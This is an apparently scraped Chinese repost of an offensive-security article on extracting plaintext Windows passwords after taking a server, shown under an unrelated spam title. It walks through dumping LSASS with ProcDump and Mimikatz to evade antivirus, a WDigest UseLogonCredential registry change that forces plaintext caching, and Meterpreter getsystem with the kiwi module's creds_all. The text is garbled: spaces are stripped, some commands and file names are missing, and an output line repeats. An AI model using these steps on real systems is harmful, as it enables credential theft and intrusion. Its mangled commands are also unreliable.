alcohol 120 破解版-502gateway
2023年4月5日发(作者:硬盘0字节)
获取Windows明⽂密码的⼩技巧
来⾃公众号:Bypass
在实战中,拿到⼀台Windows服务器权限,如果可以直接获取Windows明⽂密码的话,就可以更容易深⼊挖掘。本⽂分
享⼏个获取Windows明⽂密码的技巧,简单直接且有效。
01、Procdump+Mimikatz
利⽤procdump+Mimikatz绕过杀软获取Windows明⽂密码。
(1)⼯具准备:
ProcDump:
•
/zh-cn/sysinternals/downloads/procdump
mimikatz:
•
/gentilkiwi/mimikatz/
(2)WindowsServer2008R2提取明⽂密码
在⽬标机器上⽣成存储⽂件:
•
将复制到本地,使⽤mimikatz⼀⾏命令将结果输出到⽂本。
•
"sekurlsa::""sekurlsa::logonpasswords""exit">
如图:成功从内存中提取明⽂密码。
02、Window2012R2抓取密码
在Windows2012系统及以上的系统,默认在内存缓存中禁⽌保存明⽂密码的。攻击者可以通过修改注册表的⽅式抓取
明⽂,需要⽤户重新登录后才能成功抓取。
(1)修改注册表
•
regaddHKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest/vUseLogonCredential/t
REG_DWORD/d1/f
(2)⽤户administrator注销后重新登录,成功抓取到明⽂信息。
•
"privilege::debug""sekurlsa::logonpasswords">
03、MSFkiwi模块
使⽤kiwi模块需要system权限,所以我们在使⽤该模块之前需要将当前MSF中的shell提升为system。
提到system有两个⽅法,⼀是当前的权限是administrator⽤户,⼆是利⽤其它⼿段先提权到administrator⽤户。然后
administrator⽤户可以直接getsystem到system权限。
•
•
•
•
•
•
meterpreter>getuidServerusername:BYPASS-E97BA3FCAdministratormeterpreter>getsystem...gotsystemvia
technique1(NamedPipeImpersonation(InMemory/Admin)).meterpreter>getuidServerusername:NT
technique1(NamedPipeImpersonation(InMemory/Admin)).meterpreter>getuidServerusername:NT
AUTHORITYSYSTEM
加载kiwi模块:
•
loadkiwi
列举系统中的明⽂密码:
•
creds_all
---EOF---
推荐↓↓↓
更多推荐
windows 密码
发布评论